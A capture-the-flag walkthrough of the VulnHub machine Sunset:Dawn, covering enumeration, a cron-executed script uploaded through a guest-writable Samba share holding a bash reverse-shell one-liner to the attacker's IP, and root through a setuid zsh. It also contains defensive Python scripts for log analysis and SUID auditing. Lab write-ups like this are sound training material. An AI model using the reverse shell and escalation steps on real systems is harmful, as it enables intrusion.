[VULNHUB] Sunset:Dawn

Today we are going to hack the VulnHub machine called Sunset:Dawn. You can download it from the following link: https://www.vulnhub.com/entry/sunset-dawn,341/
  • Video
  • Enumeration
  • We start with an nmap scan to see which ports are open.
    ~ > nmap -A -p- 192.168.1.29
    Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-01 10:29 CEST
    Nmap scan report for 192.168.1.29
    Host is up (0.0011s latency).
    Not shown: 65531 closed ports
    PORT     STATE SERVICE     VERSION
    80/tcp   open  http        Apache httpd 2.4.38 ((Debian))
    |_http-server-header: Apache/2.4.38 (Debian)
    |_http-title: Site doesn't have a title (text/html).
    139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    445/tcp  open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
    3306/tcp open  mysql       MySQL 5.5.5-10.3.15-MariaDB-1
    | mysql-info:
    |   Protocol: 10
    |   Version: 5.5.5-10.3.15-MariaDB-1
    |   Thread ID: 14
    |   Capabilities flags: 63486
    |   Some Capabilities: ConnectWithDatabase, DontAllowDatabaseTableColumn, FoundRows, LongColumnFlag, SupportsTransactions, Speaks41ProtocolOld, Speaks41ProtocolNew, ODBCClient, IgnoreSigpipes, InteractiveClient, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, Support41Auth, SupportsCompression, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
    |   Status: Autocommit
    |   Salt: \qEEgYh|X#Cf[tX:V&We
    |_  Auth Plugin Name: 96
    Service Info: Host: DAWN

    Host script results:
    |_clock-skew: mean: 1h39m39s, deviation: 2h18m34s, median: 19m38s
    |_nbstat: NetBIOS name: DAWN, NetBIOS user: , NetBIOS MAC: (unknown)
    | smb-os-discovery:
    |   OS: Windows 6.1 (Samba 4.9.5-Debian)
    |   Computer name: dawn
    |   NetBIOS computer name: DAWN\x00
    |   Domain name: dawn
    |   FQDN: dawn.dawn
    |_  System time: 2020-09-01T04:49:14-04:00
    | smb-security-mode:
    |   account_used: guest
    |   authentication_level: user
    |   challenge_response: supported
    |_  message_signing: disabled (dangerous, but default)
    | smb2-security-mode:
    |   2.02:
    |_    Message signing enabled but not required
    | smb2-time:
    |   date: 2020-09-01 10:49:14
    |_  start_date: N/A

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 17.85 seconds
    We dig a bit further into port 80 to see whether there is any interesting directory.
    ~ > gobuster -u http://192.168.1.29 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt

    =====================================================
    Gobuster v2.0.1              OJ Reeves (@TheColonial)
    =====================================================
    [+] Mode         : dir
    [+] Url/Domain   : http://192.168.1.29/
    [+] Threads      : 10
    [+] Wordlist     : /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
    [+] Status codes : 200,204,301,302,307,403
    [+] Timeout      : 10s
    =====================================================
    2020/09/01 10:30:38 Starting gobuster
    =====================================================
    /.hta (Status: 403)
    /.htaccess (Status: 403)
    /.htpasswd (Status: 403)
    /index.html (Status: 200)
    /logs (Status: 301)
    /server-status (Status: 403)
    =====================================================
    2020/09/01 10:30:39 Finished
    =====================================================
    We see there is a directory called logs. We browse to it: http://192.168.1.29/logs/ There are several .log files in it; we download management.log and take a look at it.
    --SNIP--
    2020/09/01 04:48:01 CMD: UID=0    PID=844    | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control
    2020/09/01 04:48:01 CMD: UID=0    PID=851    | /usr/sbin/CRON -f
    2020/09/01 04:48:01 CMD: UID=0    PID=850    | /bin/sh -c chmod 777 /home/dawn/ITDEPT/web-control
    2020/09/01 04:48:01 CMD: UID=0    PID=849    | /bin/sh -c /home/ganimedes/phobos
    2020/09/01 04:48:01 CMD: UID=0    PID=848    | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control
    2020/09/01 04:48:01 CMD: UID=33   PID=853    | /bin/sh -c /home/dawn/ITDEPT/web-control
    2020/09/01 04:48:01 CMD: UID=1000 PID=852    | /bin/sh -c /home/dawn/ITDEPT/product-control
    --SNIP--
    We can see that scripts called web-control and product-control, located inside a folder called ITDEPT, are first made world-writable by root (chmod 777) and then executed by cron as different users (UID 33 is www-data, UID 1000 is the user dawn). In the initial scan we saw that Samba was open, so we take a look at it.
    ~ > smbclient -L 192.168.1.29
    Enter WORKGROUP\sml's password:

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        ITDEPT          Disk      PLEASE DO NOT REMOVE THIS SHARE. IN CASE YOU ARE NOT AUTHORIZED TO USE THIS SYSTEM LEAVE IMMEADIATELY.
        IPC$            IPC       IPC Service (Samba 4.9.5-Debian)
    Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------
    We see there is a share called ITDEPT (the same folder that appears in management.log), and it is listed without supplying a password. We look inside it...
    ~ > smbclient \\\\192.168.1.29\\ITDEPT
    Enter WORKGROUP\sml's password:
    Try "help" to get a list of possible commands.
    smb: \> dir
      .                                   D        0  Sat Aug  3 05:23:20 2019
      ..                                  D        0  Sat Aug  3 05:21:39 2019

                    7158264 blocks of size 1024. 3500864 blocks available
    smb: \>
    It looks like there is nothing inside. We are going to create the files product-control and web-control, each containing a command that gives us a reverse shell when cron executes it. We upload them to the ITDEPT share and wait...
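The weakness this box turns on is visible in management.log alone: a root cron job makes files world-writable and other jobs then execute them, from a directory that an unauthenticated SMB guest can write to. As an added defensive example (not part of the original writeup), the Python script below parses pspy-style log lines of the shape shown above and flags exactly that pattern: a command that grants world-write access to a file, and any later execution of such a file or of anything under an untrusted directory. The sample log is the management.log excerpt from this page; the UNTRUSTED_DIRS list, the function names and the Finding record are this example's own assumptions.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Set

# pspy-style line: "2020/09/01 04:48:01 CMD: UID=0 PID=844 | /bin/sh -c chmod 777 /path"
LOG_RE = re.compile(
    r"^(?P<ts>\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) CMD: "
    r"UID=(?P<uid>\d+)\s+PID=(?P<pid>\d+)\s+\|\s+(?P<cmd>.*)$"
)
CHMOD_RE = re.compile(r"\bchmod\s+(?:-\S+\s+)*(?P<mode>\S+)\s+(?P<paths>.+)$")

# Assumption for this example: directories untrusted users can write to
# (on this box, the guest-writable ITDEPT Samba share).
UNTRUSTED_DIRS = ("/home/dawn/ITDEPT",)

# Constructed sample: the management.log excerpt shown in the writeup.
SAMPLE_LOG = """\
2020/09/01 04:48:01 CMD: UID=0 PID=844 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control
2020/09/01 04:48:01 CMD: UID=0 PID=851 | /usr/sbin/CRON -f
2020/09/01 04:48:01 CMD: UID=0 PID=850 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/web-control
2020/09/01 04:48:01 CMD: UID=0 PID=849 | /bin/sh -c /home/ganimedes/phobos
2020/09/01 04:48:01 CMD: UID=0 PID=848 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control
2020/09/01 04:48:01 CMD: UID=33 PID=853 | /bin/sh -c /home/dawn/ITDEPT/web-control
2020/09/01 04:48:01 CMD: UID=1000 PID=852 | /bin/sh -c /home/dawn/ITDEPT/product-control
"""


@dataclass
class Finding:
    ts: str
    uid: int
    pid: int
    reason: str
    cmd: str


def mode_grants_world_write(mode: str) -> bool:
    """True if a chmod mode argument gives 'other' write access (octal or symbolic)."""
    if re.fullmatch(r"[0-7]{3,4}", mode):
        return bool(int(mode[-1], 8) & 0o2)  # last octal digit is the 'other' class
    for clause in mode.split(","):
        m = re.fullmatch(r"(?P<who>[ugoa]*)(?P<op>[+=])(?P<perm>[rwxXst]*)", clause)
        if not m or "w" not in m["perm"]:
            continue
        # An empty class means "all" (subject to umask); 'o' and 'a' name "other" explicitly.
        if m["who"] == "" or "o" in m["who"] or "a" in m["who"]:
            return True
    return False


def world_writable_targets(cmd: str) -> List[str]:
    """Paths that a chmod in this command line makes world-writable (empty if none)."""
    m = CHMOD_RE.search(cmd)
    if not m or not mode_grants_world_write(m["mode"]):
        return []
    return m["paths"].split()


def executed_path(cmd: str) -> Optional[str]:
    """The program a logged command runs, looking through a '/bin/sh -c ...' wrapper."""
    argv = cmd.split()
    if len(argv) >= 3 and argv[0].endswith("sh") and argv[1] == "-c":
        argv = argv[2:]
    return argv[0] if argv else None


def analyze(log_text: str) -> List[Finding]:
    """Single pass over the log: remember what was made world-writable, flag its execution."""
    findings: List[Finding] = []
    writable: Set[str] = set()
    prefixes = tuple(d.rstrip("/") + "/" for d in UNTRUSTED_DIRS)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # pspy also prints FS events and banners; ignore anything else
        ts, uid, pid, cmd = m["ts"], int(m["uid"]), int(m["pid"]), m["cmd"]
        targets = world_writable_targets(cmd)
        if targets:
            writable.update(targets)
            findings.append(Finding(ts, uid, pid, "makes file world-writable", cmd))
            continue
        exe = executed_path(cmd)
        if exe is None:
            continue
        if exe in writable:
            findings.append(Finding(ts, uid, pid, "executes world-writable file", cmd))
        elif exe.startswith(prefixes):
            findings.append(Finding(ts, uid, pid, "executes file from untrusted directory", cmd))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"{f.ts} uid={f.uid} pid={f.pid}: {f.reason}: {f.cmd}")
```

On the sample log this flags the three chmod 777 jobs and the two executions of the chmod-ed scripts, while the root job running /home/ganimedes/phobos is left alone because nothing made it writable and it is not on the share. The same logic can be fed from auditd EXECVE records once they are normalised to the same shape. The fix on the host side is the obvious one: cron must not execute files that an SMB guest can replace, and the ITDEPT share should be read-only or require authentication.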
  • Low Shell
    ~ > nano product-control
    ~ > cp product-control web-control
    ~ > cat product-control
    #!/bin/bash
    bash -i >& /dev/tcp/192.168.1.59/7777 0>&1
    We upload them to the ITDEPT share.
    ~ > smbclient \\\\192.168.1.29\\ITDEPT
    Unable to initialize messaging context
    Enter WORKGROUP\sml's password:
    Try "help" to get a list of possible commands.
    smb: \> put web-control
    putting file web-control as \web-control (6,0 kb/s) (average 6,0 kb/s)
    smb: \> put product-control
    putting file product-control as \product-control (13,4 kb/s) (average 8,3 kb/s)
    smb: \> ls
      .                                   D        0  Tue Sep  1 11:05:38 2020
      ..                                  D        0  Sat Aug  3 05:21:39 2019
      web-control                         A       55  Tue Sep  1 11:05:32 2020
      product-control                     A       55  Tue Sep  1 11:05:38 2020

                    7158264 blocks of size 1024. 3500820 blocks available
    smb: \>
    We start nc listening.
    ~ > nc -nlvp 7777
    listening on [any] 7777 ...
    And after a while...
    ~ > nc -nlvp 7777
    listening on [any] 7777 ...
    connect to [192.168.1.59] from (UNKNOWN) [192.168.1.29] 44558
    bash: cannot set terminal process group (1241): Inappropriate ioctl for device
    bash: no job control in this shell
    www-data@dawn:~$
  • Privilege Escalation
  • Now that we are inside the system, we upgrade to a proper TTY and look for SUID files.
    www-data@dawn:~$ python -c 'import pty;pty.spawn("/bin/bash")'
    www-data@dawn:~$ find / -perm -4000 2>/dev/null
    /usr/sbin/mount.cifs
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /usr/lib/policykit-1/polkit-agent-helper-1
    /usr/lib/eject/dmcrypt-get-device
    /usr/lib/openssh/ssh-keysign
    /usr/bin/su
    /usr/bin/newgrp
    /usr/bin/pkexec
    /usr/bin/passwd
    /usr/bin/sudo
    /usr/bin/mount
    /usr/bin/zsh
    /usr/bin/gpasswd
    /usr/bin/chsh
    /usr/bin/umount
    /usr/bin/chfn
    /home/dawn/ITDEPT
    We see that zsh is SUID root... a setuid shell runs with the owner's effective UID, which will let us escalate privileges. We run it.
    www-data@dawn:~$ /usr/bin/zsh
    /usr/bin/zsh
    #id
    uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
    #
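A setuid zsh in the find output above is the kind of deviation a periodic audit should catch before an attacker does. As an added defensive example (not part of the original writeup), the Python below compares a `find / -perm -4000` listing against a baseline of expected setuid binaries and explains why each extra entry matters: a shell or interpreter hands its effective UID to anyone who can run it, and anything under a user-writable tree is suspect. The sample listing is the one from this page; the DEBIAN_BASELINE set is an assumed stock Debian 10 baseline, and the function names and the SuidFinding record are this example's own.

```python
import os
import re
import stat
from dataclasses import dataclass
from typing import Iterable, List

# Constructed sample: the `find / -perm -4000` output shown in the writeup.
SAMPLE_FIND_OUTPUT = """\
/usr/sbin/mount.cifs
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/su
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/mount
/usr/bin/zsh
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/umount
/usr/bin/chfn
/home/dawn/ITDEPT
"""

# Assumed baseline: setuid binaries expected on a stock Debian 10 host. Build yours
# from a known-good image, never from the machine under review.
DEBIAN_BASELINE = frozenset({
    "/usr/sbin/mount.cifs", "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/policykit-1/polkit-agent-helper-1", "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/openssh/ssh-keysign", "/usr/bin/su", "/usr/bin/newgrp", "/usr/bin/pkexec",
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/mount", "/usr/bin/gpasswd",
    "/usr/bin/chsh", "/usr/bin/umount", "/usr/bin/chfn",
})

# A setuid shell or interpreter gives its euid to anyone who can execute it.
SHELLS_AND_INTERPRETERS = {"sh", "bash", "dash", "zsh", "ksh", "fish",
                           "python", "perl", "ruby", "php", "lua", "node"}
USER_WRITABLE_PREFIXES = ("/home/", "/tmp/", "/var/tmp/", "/dev/shm/")


@dataclass
class SuidFinding:
    path: str
    reasons: List[str]


def audit_suid(paths: Iterable[str], baseline=DEBIAN_BASELINE) -> List[SuidFinding]:
    """Return every listed path missing from the baseline, with the reasons it is risky."""
    findings: List[SuidFinding] = []
    for path in paths:
        path = path.strip()
        if not path or path in baseline:
            continue
        reasons = ["not in baseline"]
        name = re.sub(r"[\d.]+$", "", os.path.basename(path))  # python3.7 -> python
        if name in SHELLS_AND_INTERPRETERS:
            reasons.append("setuid shell/interpreter")
        if path.startswith(USER_WRITABLE_PREFIXES):
            reasons.append("lives under a user-writable tree")
        findings.append(SuidFinding(path, reasons))
    return findings


def collect_suid(root: str = "/") -> List[str]:
    """Live equivalent of `find ROOT -perm -4000 -type f`: regular files only, no symlinks."""
    hits: List[str] = []
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda e: None):
        for fn in filenames:
            full = os.path.join(dirpath, fn)
            try:
                st = os.lstat(full)
            except OSError:
                continue  # unreadable or vanished between listing and stat
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(full)
    return hits


if __name__ == "__main__":
    for f in audit_suid(SAMPLE_FIND_OUTPUT.splitlines()):
        print(f"{f.path}: {', '.join(f.reasons)}")
```

On the sample listing the audit reports /usr/bin/zsh (setuid shell) and /home/dawn/ITDEPT (under /home). The directory shows up because `find -perm -4000` without `-type f` also matches directories; Linux ignores the setuid bit on directories, so it is harmless in itself, but it is still a permission nobody set on purpose. Running `audit_suid(collect_suid())` against a host-specific baseline is the scheduled check; the remediation for the shell is simply `chmod u-s /usr/bin/zsh`.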
  • root.txt
  • Finally, we read the root flag :)
    dawn# cd /root
    #ls
    flag.txt  pspy64
    #cat flag.txt
    Hello! whitecr0wz here. I would like to congratulate and thank you for finishing the ctf, however, there is another way of getting a shell(very similar though). Also, 4 other methods are available for rooting this box!
    flag{3a3e52f0a6af0d6e36d7c1ced3a9fd59}
  • End
  • And with that we are root on the machine.